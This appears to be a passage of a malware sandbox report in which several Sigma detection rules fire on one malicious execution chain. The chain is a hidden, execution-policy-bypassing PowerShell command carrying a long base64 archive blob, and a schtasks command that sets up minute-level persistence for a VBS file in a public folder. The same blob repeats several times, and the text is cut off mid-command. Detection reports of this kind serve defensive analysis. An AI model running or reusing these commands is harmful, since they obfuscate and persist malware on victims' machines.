yMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxSobWrEaU+5zidW5S47g/TVDOAgA4HnPB/8uSMdbEIEuS
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROv
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROvDfZz12KXNWdTV0mrsC7rxdgdrDo9lmSptbLmh0s8yG7IChQVQnWtrn7ZxLeoG7LixLygYiydlfChpMJXUJEQHuSKo1oBE61extRqxfGiLa1a8+9rcr3KWgYv8e8VPwsKSKdq8VCL5926adYdG19gK5pWjN3TDNUmd9QW+dI05Drj91ndHh+jyrbzma3JYyMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxSobWrEaU+5zidW5S47g/TVDOAgA4HnPB/8uSMdbEIEuS
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROvDfZz12KXNWdTV0mrsC7rxdgdrDo9lmSptbLmh0s8yG7IChQVQnWtrn7ZxLeoG7LixLygYiydlfChpMJXUJEQHuSKo1oBE61extRqxfGiLa1a8+9rcr3KWgYv8e8VPwsKSKdq8VCL5926adYdG19gK5pWjN3TDNUmd9QW+dI05Drj91ndHh+jyrbzma3JYyMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxSobWrEaU+5zidW5S47g/TVDOAgA4HnPB/8uSMdbEIEuS
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c 